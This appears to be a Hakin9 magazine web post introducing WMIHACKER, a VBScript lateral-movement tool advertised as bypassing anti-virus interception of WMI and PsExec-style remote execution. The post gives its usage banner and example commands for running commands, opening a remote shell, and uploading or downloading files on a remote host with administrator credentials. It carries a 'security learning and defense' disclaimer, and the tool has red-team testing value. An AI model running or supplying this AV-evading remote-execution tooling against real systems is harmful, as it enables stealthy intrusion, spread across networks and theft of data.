Bypass anti-virus software lateral movement command execution test tool（No need 445 Port）
Introduction: The common WMIEXEC, PSEXEC tool execution command is to create a service or call Win32_Process.create, these methods have been intercepted by Anti-virus software 100%, so we created WMIHACKER (Bypass anti-virus software lateral movement command execution test tool（No need 445 Port）).
Disclaimer: The technology involved in this project is only for security learning and defense purposes, illegal use is prohibited!
Main functions: 1. Command execution; 2. File upload; 3. File download
How to use
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs __ ____ __ _____ _ _ _____ _ ________ _____ \ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \ \ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) | \ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ / \ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \ \/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\ v0.6beta By. [email protected] Usage: WMIHACKER.vbs /cmd host user pass command GETRES? WMIHACKER.vbs /shell host user pass WMIHACKER.vbs /upload host user pass localpath remotepath WMIHACKER.vbs /download host user pass localpath remotepath /cmd single command mode host hostname or IP address GETRES? Res Need Or Not, Use 1 Or 0 command the command to run on remote host
The result is displayed after the command is executed
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
No results are displayed after the command is executed
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0
> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"
File upload: copy the local calc.exe to the remote host c:\calc.exe
> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"
File download: Download the remote host calc.exe to the local c:\calc.exe
> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"
- Hakin9 is a monthly magazine dedicated to hacking and cybersecurity. In every edition, we try to focus on different approaches to show various techniques - defensive and offensive. This knowledge will help you understand how most popular attacks are performed and how to protect your data from them. Our tutorials, case studies and online courses will prepare you for the upcoming, potential threats in the cyber security world. We collaborate with many individuals and universities and public institutions, but also with companies such as Xento Systems, CATO Networks, EY, CIPHER Intelligence LAB, redBorder, TSG, and others.
- Blog2022.12.13What are the Common Security Weaknesses of Cloud Based Networks?
- Blog2022.10.12Vulnerability management with Wazuh open source XDR
- Blog2022.08.29Deception Technologies: Improving Incident Detection and Response by Alex Vakulov
- Blog2022.08.25Exploring the Heightened Importance of Cybersecurity in Mobile App Development by Jeff Kalwerisky